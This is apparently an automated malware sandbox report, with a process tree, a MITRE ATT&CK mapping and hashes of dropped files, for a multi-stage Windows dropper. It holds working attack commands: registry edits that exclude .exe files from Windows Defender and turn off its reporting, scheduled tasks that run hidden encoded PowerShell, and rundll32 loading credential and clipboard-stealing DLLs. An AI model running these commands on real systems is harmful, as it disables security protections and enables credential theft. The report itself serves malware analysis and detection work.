"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
8⤵
PID:2292

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
9⤵
PID:792

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
10⤵
PID:6456

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
10⤵
PID:6616

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
8⤵
PID:3796

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
9⤵
PID:5648

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
10⤵
PID:6212

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
10⤵
PID:6376

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gQXVKAbFv" /SC once /ST 05:54:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
8⤵
- Creates scheduled task(s)
PID:6260

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gQXVKAbFv"
8⤵
PID:6568

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gQXVKAbFv"
8⤵
PID:3804

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 18:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\HHdbqXC.exe\" id /eTsite_idNIV 385118 /S" /V1 /F
8⤵
- Creates scheduled task(s)
PID:1284

C:\Users\Admin\Pictures\ZHlUB29eC3nlTN6shTXVLnct.exe
"C:\Users\Admin\Pictures\ZHlUB29eC3nlTN6shTXVLnct.exe"
5⤵
PID:2900

C:\Users\Admin\Pictures\JGaPtjeyjhHAHHzU9e2DA50A.exe
"C:\Users\Admin\Pictures\JGaPtjeyjhHAHHzU9e2DA50A.exe"
5⤵
PID:6124

C:\Users\Admin\AppData\Local\Temp\7zSFCF9.tmp\Install.exe
.\Install.exe
6⤵
PID:2864

C:\Users\Admin\AppData\Local\Temp\7zSAB4.tmp\Install.exe
.\Install.exe /IfvkdidQBhF "385118" /S
7⤵
PID:5368

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
8⤵
PID:3064

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
9⤵
PID:3764

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
10⤵
PID:6252

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
10⤵
PID:6464

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
8⤵
PID:3872

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
9⤵
PID:6220

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
10⤵
PID:6544

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
10⤵
PID:6736

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "glpBjBHeg" /SC once /ST 11:58:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
8⤵
- Creates scheduled task(s)
PID:6196

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "glpBjBHeg"
8⤵
PID:6536

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "glpBjBHeg"
8⤵
PID:6964

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 18:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\rEKKKWN.exe\" id /sZsite_idNOT 385118 /S" /V1 /F
8⤵
- Creates scheduled task(s)
PID:4876

C:\Users\Admin\Pictures\lCJlmTC3GPER80a2GN05hy5Q.exe
"C:\Users\Admin\Pictures\lCJlmTC3GPER80a2GN05hy5Q.exe" --silent --allusers=0
5⤵
PID:5168

C:\Users\Admin\Pictures\lCJlmTC3GPER80a2GN05hy5Q.exe
C:\Users\Admin\Pictures\lCJlmTC3GPER80a2GN05hy5Q.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2c0,0x2c4,0x2c8,0x29c,0x2cc,0x6ae9e1d0,0x6ae9e1dc,0x6ae9e1e8
6⤵
PID:5680

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\lCJlmTC3GPER80a2GN05hy5Q.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\lCJlmTC3GPER80a2GN05hy5Q.exe" --version
6⤵
PID:1608

C:\Users\Admin\Pictures\lCJlmTC3GPER80a2GN05hy5Q.exe
"C:\Users\Admin\Pictures\lCJlmTC3GPER80a2GN05hy5Q.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5168 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240330182723" --session-guid=bd863443-f9c2-491b-959c-baebeccfac05 --server-tracking-blob=MjQxNGFmMzM5MTQxZTM3ZTZmNjQ5NjBmNjU1NzEzZGI4NzczNzYxZmQxNjQyNTI1ZjZjYTVhZWM2ODgxNDRmZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N18xMjMiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMSIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE4MjMyMTEuMzEzNCIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N18xMjMiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6ImJkMmE1YjZhLTI2MTYtNDBiYi05MWUxLTQ2Njc4ZDExNzM1YSJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=8805000000000000
6⤵
PID:6020

C:\Users\Admin\Pictures\lCJlmTC3GPER80a2GN05hy5Q.exe
C:\Users\Admin\Pictures\lCJlmTC3GPER80a2GN05hy5Q.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6a51e1d0,0x6a51e1dc,0x6a51e1e8
7⤵
PID:1920

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403301827231\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403301827231\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
6⤵
PID:1640

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403301827231\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403301827231\assistant\assistant_installer.exe" --version
6⤵
PID:6192

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403301827231\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403301827231\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x294,0x298,0x29c,0x270,0x2a0,0x11b0040,0x11b004c,0x11b0058
7⤵
PID:6344

C:\Users\Admin\AppData\Local\Temp\1001063001\Playdoubonus2.exe
"C:\Users\Admin\AppData\Local\Temp\1001063001\Playdoubonus2.exe"
2⤵
PID:5560

C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe
"C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe"
2⤵
PID:4680

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3004

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 864
3⤵
- Program crash
PID:5632

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
2⤵
PID:3764

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
3⤵
PID:5200

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
2⤵
PID:5180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4680 -ip 4680
1⤵
PID:596

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
PID:3456

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:1344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4864 -ip 4864
1⤵
PID:4660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 808 -ip 808
1⤵
PID:2476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6800

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
PID:6740

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:6652

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403301827231\additional_file0.tmp

Filesize
2.5MB

MD5
20d293b9bf23403179ca48086ba88867

SHA1
dedf311108f607a387d486d812514a2defbd1b9e

SHA256
fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348

SHA512
5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403301827231\opera_package

Filesize
100.0MB

MD5
ca291eef486adf84b7ecd65b2d0af0b9

SHA1
620546c5aad1ae2827ec844dd194aabcb97c1797

SHA256
4c3a63777e5476b2cd88bea8c3cfd68cb249f7bddd49896f9a187b49e3d6005e

SHA512
0fd5951d42dbfb585d1fd66552aeed0820f9caa5b461b77342cfa8bd293813b85d08155c82d4788fb29bb642ca0a9a19c3a75d427ddb3596f41297a11c54313e

Download Submit
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe

Filesize
1.8MB

MD5
1cb7e3de5d7e1580d2f220179a296dce

SHA1
06575f15ad002512f215744a8ff65ccb88bbb57a

SHA256
a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7

SHA512
53e45fa355b948d127cb8fc145c193498363316ac71977b3e55c4ce983f2887bc20aa1e60f4dc019e4489a3f466f469b71e5db8c15fe6f9d8ff47a0a8be54005

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000183001\Uni400uni.exe

Filesize
391KB

MD5
5c3297d35939791c58123416d5aeb0bb

SHA1
b2961b77703c4ddc27d9ccc03f86b18bda01557c

SHA256
e38578be4691555fe68909d1bd881e8dd43740749ce6c517b6f025de4b48ae14

SHA512
f81981af46503d17ef9c2260d5e74082bd30a71d225ec2c7530560691e55badc2b359e368b36fe8a006733634f982aa1838d09cf2e8874db72af178f1b0cb972

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe

Filesize
3.1MB

MD5
4b349cf43b7e84401812a470320cbc00

SHA1
811318b6d6356128edc59224c1329414e2e42c52

SHA256
e3416e189968cdd35e4038d12c9c4a89f8b2188f0f6b5b5db3d7a6406281e4ac

SHA512
aeab86f00caf6b21b8693368b59b64c6602e7cf9ae7341b84882d89066a2b311317e79c77340d0ecfbb34dac8830fa55f100808936bd8e4c791cca3724f992e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe

Filesize
1.7MB

MD5
85a15f080b09acace350ab30460c8996

SHA1
3fc515e60e4cfa5b3321f04a96c7fb463e4b9d02

SHA256
3a2006bc835a8ffe91b9ee9206f630b3172f42e090f4e8d90be620e540f5ef6b

SHA512
ade5e3531dfa1a01e6c2a69deb2962cbf619e766da3d6e8e3453f70ff55ccbcbe21381c7b97a53d67e1ca88975f4409b1a42a759e18f806171d29e4c3f250e9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe

Filesize
1.8MB

MD5
a25b46f5edd72724417c637e8e33f64b

SHA1
f4cba5b47829e9c89ab72564f0b146c3af5300eb

SHA256
346c7d1fc9a65c1f071034126d263ca47ce7d80a1a1b173e373fe664541d51e4

SHA512
d145822656ae774308c72df217082cb2abfc67a626c5e3fe55fcda965d81443096942b6fe14b34e96a19562817d892f50bb697477567481c863b29998c91d71f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe

Filesize
301KB

MD5
832eb4dc3ed8ceb9a1735bd0c7acaf1b

SHA1
b622a406927fbb8f6cd5081bd4455fb831948fca

SHA256
2a82243697e2eec45bedc754adcdc1f6f41724a40c6d7d96fd41ad144899b6f7

SHA512
3ab8b25732a7152608be101a3daf0d55833c554ab968be8b3b79a49e1831f3ee0eeeb9586a3334fa387b1f160fd15e98a80dcfece559c9c257b44ef962874894

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe

Filesize
499KB

MD5
83d0b41c7a3a0d29a268b49a313c5de5

SHA1
46f3251c771b67b40b1f3268caef8046174909a5

SHA256
09cc3364d5e1c15228822926bc65ce290c487dc3b7c0345bf265538110fa9cc9

SHA512
705ecc7c421338e37ed0d58c2d9fad03fb3565db422a0c9d895e75a399bf5f2a70cfe3ffdc860ffe010d4d1a213e0a844aeadb89ea8e0c830a2fc8c03b7669b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe

Filesize
464KB

MD5
c084d6f6ba40534fbfc5a64b21ef99ab

SHA1
0b4a17da83c0a8abbc8fab321931d5447b32b720

SHA256
afd83290a2adb219c3f1b8fbf23c27b0994fe76dfbb7dc0b416530dc0e21f624

SHA512
a5384a2f7029cf946fde44e1ff30775754ce525ca5a6fdac14184872b6e684cb6e585053cb86d32f82cbd3db48eb195ba3a642d8ee3774be579fccd993938ca1

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe

Filesize
418KB

MD5
0099a99f5ffb3c3ae78af0084136fab3

SHA1
0205a065728a9ec1133e8a372b1e3864df776e8c

SHA256
919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

SHA512
5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001063001\Playdoubonus2.exe

Filesize
2.4MB

MD5
9b187c7f59d06bc8ea725c898755a430

SHA1
ffdc7dca6b8d6208af787d0816b6be17823ea686

SHA256
7b5c718279ab678476ab6fdb61fd9b70896f7700e1c79045935bc0bf3cb3590b

SHA512
c49fb79df81788811ae98090d3032ac89914d8f2d9c6c7a22eeacccd80420820b276be76edce2dfacb82669dcd76e99184cee0613e70036b250a279b8343f21e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe

Filesize
379KB

MD5
90f41880d631e243cec086557cb74d63

SHA1
cb385e4172cc227ba72baf29ca1c4411fa99a26d

SHA256
23b62a27e3f5c424b16f31e5009af4f24c8bd13b1f035f87879e2a29236be7a0

SHA512
eeb85b34aa66a7e9a1b1807012999ee439433df23126a52ffa8d4b3cb2026be3bcf63ca25f143de58ba929c0d4feeaf2a603fd6ec6b5379fc48147c22f3783e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSAB4.tmp\Install.exe

Filesize
6.7MB

MD5
b119ea556def66eaa9f751a650b45af0

SHA1
daf3fa0325b110183d0a233b4b0d1875f0b49ca8

SHA256
53c38771ea9986f418a48d89e4df5e82c84f1e71a4c242fc6e6ae3ba934cf6d4

SHA512
08dd919ce39af698051b4f156faa8d155c41cc0de3412ef152dc6e90cbdd5cb50109f57c47555925fd6d18816411b1c510ac642b9576f5f28540be8695ed46c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSEAC8.tmp\Install.exe

Filesize
6.4MB

MD5
3eab70a4f95b1fcfe921ef7767d9c782

SHA1
5dc328b5ea71874312fbf9ddc321aede71d48bf7

SHA256
3b58c6a2294a225588e9c407b805db6a0b42e6b1cc651991c4aa5573c59d4df7

SHA512
d3cc61b0dc5a38df3205375aaddcd376a1643c8cf3f98dd91f3c45da0aa42d6d0f5e94b26cdf492a3c45e8ac0d612537ec7621d1da729927752e63491313d346

Download Submit
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403301827202845168.dll

Filesize
4.6MB

MD5
117176ddeaf70e57d1747704942549e4

SHA1
75e3ab6b3469d93cce9ea2f7e22b71b987ccdf2b

SHA256
3c5b34de987116a4d3240e319c0da89a951c96b81e6705476a0fea27b22b20af

SHA512
ca2a356929c92d314aab63d7f3b246d72783212dfa3a4507f28d41a51ca0eedc78e85b1cd453aa8e02c12509f847a0216bb702154f903291c804c8a98ec378b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tmp1EFD.tmp

Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xa4s4y0h.vbw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
2KB

MD5
3e372bfc37fd29eca444043f0b5cc566

SHA1
5d5e8fff74c2dbba4820a1ad71125eb66ed43226

SHA256
6a41feb33c8e642037ea8c634c910683b812049ce6e945892615e0bc0c69df19

SHA512
91cc06fa5d0a64acc3b7eca1c4625aaa9d2830b09ece003a61f9de32dd04e37ac1c38fdd061efae7f18092f98840cfcbc4a405a38dd246f7dec31fae6e2b4485

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
3KB

MD5
d11a5e09d839ede1c3c62575654ef0a1

SHA1
d346dd62982fd3e59fca4aa82f6c09ec419e4398

SHA256
6d570dd1a824f9de5d12ad74df6ec89ba09f234ea3ef3f63f11a737ef1bf6e33

SHA512
731731e37a6a700ca72bb624f0321c24a33419064bddfb351c84ba09f69bc3e805d5a11cd1a91b4973021af0fa0a37b284bf7252343a75db51bbf0d89650d750

Download Submit
C:\Users\Admin\AppData\Local\Temp\u3r4.0.exe

Filesize
314KB

MD5
3dfa453901a142aad80b39a6f0bf8343

SHA1
40c81f170e986b6330dc7569694b3126fd754e57

SHA256
9b48a241ba616a59394b82a9ddee64973c9d9dd91d0445333718e655a3f92798

SHA512
7535e55b961aebbd0da9b23a9a239695efccccffdcfa589552aec8a5b5b238b0040119b7176836e355101009e599ed3739346528d1849385af31e8ce8ae2bdf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\u3r4.1.exe

Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
